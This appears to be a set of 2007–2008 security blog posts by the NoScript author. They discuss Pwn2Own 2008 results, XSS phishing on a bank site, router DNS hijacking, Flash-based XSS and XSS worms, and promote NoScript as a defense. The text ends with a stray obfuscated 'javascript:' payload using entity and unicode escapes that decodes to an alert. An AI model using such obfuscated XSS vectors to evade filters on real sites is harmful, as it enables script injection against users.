hackademix.net

CanSecWest’s Pwn2Own 2008 contest had heavy coverage in the past days, so I will recap rules and results very quickly.

Three targets, all patched. All in typical client configurations with typical user configurations. You hack it, you get to keep it.

Targets (typical road-warrior clients):

• VAIO VGN-TZ37CN running Ubuntu 7.10
• Fujitsu U810 running Vista Ultimate SP1
• MacBook Air running OSX 10.5.2

Competition started on March 26^th, and was meant to last 3 days with decreasing difficulty level:

1. Bare OS, no extra application
   No laptop got hacked
2. Applications bundled with the OS (e.g. web browser)
   Mac OS X got pwned through a Safari vulnerability
3. 3rd party popular applications
   Vista fell down because of a Flash vulnerability reportedly exploited through a Java vector

Needless to say, after day 2 titles were slight variations on the “Mac OS X Hacked First” theme, while last day the song changed into “Vista Breached, Linux Unbeaten”, casting the event into a security contest among OSes.
While I’m very happy to see a free (as in beer and as in speech) software being depicted by media coverage as the best choice (security wise) over two commercial alternatives, I think that Nathan Mc Feters, even as biased toward Microsoft as he sounds recently, offers a rather objective report:

1. None of the 3 OSes could be violated 1^st day, when pure OS security was tested
2. Mac OS X was taken because the high-level softwares it bundles (especially its web browser and multimedia plugins) are not as safe as its FreeBSD-derivative core
3. Vista was hacked because, notwithstanding all its security enhancements, ubiquitous 3^rd party software can work around them and make a relatively safe OS exploitable

Now some simple considerations:

• Safari is a web browser
• Flash and Java are browser-hosted tecnologies, and they’re both cross-platform: in facts, according to Shane Macaulay who won the Vista laptop, the vulnerabilities he found “could affect Linux or Mac OS X” too
• The browser appears to be the weakest spot in PC security, no matter the OS, while it’s probably the single most used application

Corollary: whatever OS you prefer, never browse the web without NoScript :)

A NoScript user nicknamed hewee just wrote on the forum:

A couple weeks back I was on a site that had so much going on and that flash box was so small that I right clicked on the placeholder and clicked “Open Link in New Window”. This has worked on almost all flash games and the best part is the game window size is bigger or full screen so you can see things so much better.

When, some months ago, I changed the behavior of plugin content placeholders to be more link-like, the main intentions were allowing other tools like FlashGot to transparently process the blocked content URL as a part of the document, and letting users right-click and choose “Save Link As…”.

Looks like I missed the most obvious and funny side-effect: click this link, middle-click the Flash placeholder, left-click the placeholder filling the new tab… et voilà, full window game!

Users discovering unintended but nice usages for your creature is always exciting, in the true spirit of hacking :)
Thank you hewee!

The future of malware doesn’t belong to our hard disks.
While we’re still trying to harden our PCs against malicious executables by using unprivileged accounts, wrapping our browsers inside sandboxes and trusting antivirus programs, our digital assets are quickly moving to another place: how much of our identity and money is already on the Web? Even better, how much of our identity and money is not available somewhere on the Web yet?

Since most malware is after our identity, our money or both, why shouldn’t it follow the same path?
And if today’s malware mostly runs on Windows because it’s the commonest executable platform, tomorrow’s will likely run on the Web, for the very same reason. Because, like it or not, Web is already a huge executable platform, and we should start thinking at it this way, from a security perspective.

I know my words may sound too much speculative, even plain FUD, but real scams and very scary proof of concepts are already here, mocking the “old school” belief that only local execution and privilege escalation are severe threats:

• Real scam — The ultimate bank phishing using XSS.
  The credential harvesting form has been embedded inside the real bank page, served through a “secure” HTTPS connection with a valid SSL certificate, exploiting a reflected XSS vulnerability. Absolutely nothing new, and a relatively poorly performed trick too: the attackers could have as easily choose to host the whole payload inside their XSS vector itself, making their fraud even stealthier without the remote inclusion of an external resource from a different domain. But since they didn’t, surely they estimated their way is good enough to work — and it is, much more than any other phishing attempt you’ve seen so far, because this is the real bank site!!!
• Scary Proof of Concept — Malicious web page hijacking your router.
  You may think you’ve already heard this one: “Just change the default password, it’s basic common sense” you say.
  But this time it’s different: GNUCITIZEN guys show us how to compromise your router’s DNS settings from the web with no need to log in, by exploiting its “cool” UPnP features through XmlHttpRequest (if a XSS vulnerability is available, as it happens in many devices) or Flash (if no XSS is found). And once an attacker owns your router’s DNS, he controls all your LAN, not just your own traffic…

Does anybody still believe browsing the Web with Flash and JavaScript promiscuously enabled and no XSS protection is a good idea?

Rich Cannings recently documented Flash-based XSS, clarifying with some examples the quite fuzzy coverage this issue received so far.
Its “The Fix / Users” section says:

Update to the latest version of Flash Player plugin. This will protect users from attacks using the “asfunction” protocol handler

Unfortunately, the majority of the examples listed right there do not use the “asfunction” protocol handler at all!

More realistically, Jeremiah Grossman writes:

- Users update their Flash player – Based on the nature of the issue, I’m not certain of how much benefit to this there is, but might as well patch anyway if there is one available.

- Disable or block Flash content – I think most people reading this probably already do some form of Flash blocking, but for everyone else, there are simply not going to.

Now, the “some form of Flash blocking” Jeremiah’s talking about is most likely NoScript, which:

1. Blocks Flash (and other plugins) by default when the content comes from an untrusted web site
2. Blocks Flash (and other plugins) by default when content from a trusted website is embedded in an untrusted page - this prevents embedded Flash XSS
3. Checks cross sites requests for script injection and sanitizes them as needed - this prevents reflected XSS, included the Flash variants

The best thing, making this approach much more viable than “disabling Flash content” tout-court, is that you can allow individual blocked content pieces with a click, having a chance to examine their types and full addresses before running them: this is what may save you from being owned in a Flash ;)

Looks like 2007 improved XSS awareness in the “mainstream” media outlets too.
The Register recently published a report about the Orkut XSS worm. It’s not the first time, here’s a list of XSS worms and some already hit The Register’s columns, but the level of understanding is visibly getting better. This is clearly good, because XSS worms are becoming more and more common. While at this moment we can mainly see goliardic demonstrations, like this nice hi5.com Xmas gift by my friend Sirdarckcat, we should all be worried of how easy and quick to find and exploit this kind of web application flaws is, and ready for the real scams that are unavoidably coming (like this), thanks to the growing importance of so called “Web 2.0 social networks” and other web services in our private and business lives.

The Register has also “discovered” Flash-based XSS, something that is surely old news in our circles: as you may remember, Sirdarkcat’s attack on RSnake was based on that.

The good news is that you, dear NoScript user, are already immune from both the aforementioned XSS worms, which are based on cross-site XBL (something which is also mitigated by Firefox 3) and more generally on 3rd party script inclusion.
Even better, you’re also protected against Flash-based XSS, included RSnake’s kind, now in NoScript default configuration: latest NoScript, in facts, won’t run Flash applets (and other plugins) even if hosted on trusted sites, when they’re embedded or linked from an untrusted site. In other words, it prevents browser plugins from being exploited for XSS in its very definition.

java&
#x73;cript:
\u0061\u006c\u0065\u0072\u0074\u0028\u0022
\u0048\u0061\u0070\u0070\u0079 " + 0×07D8)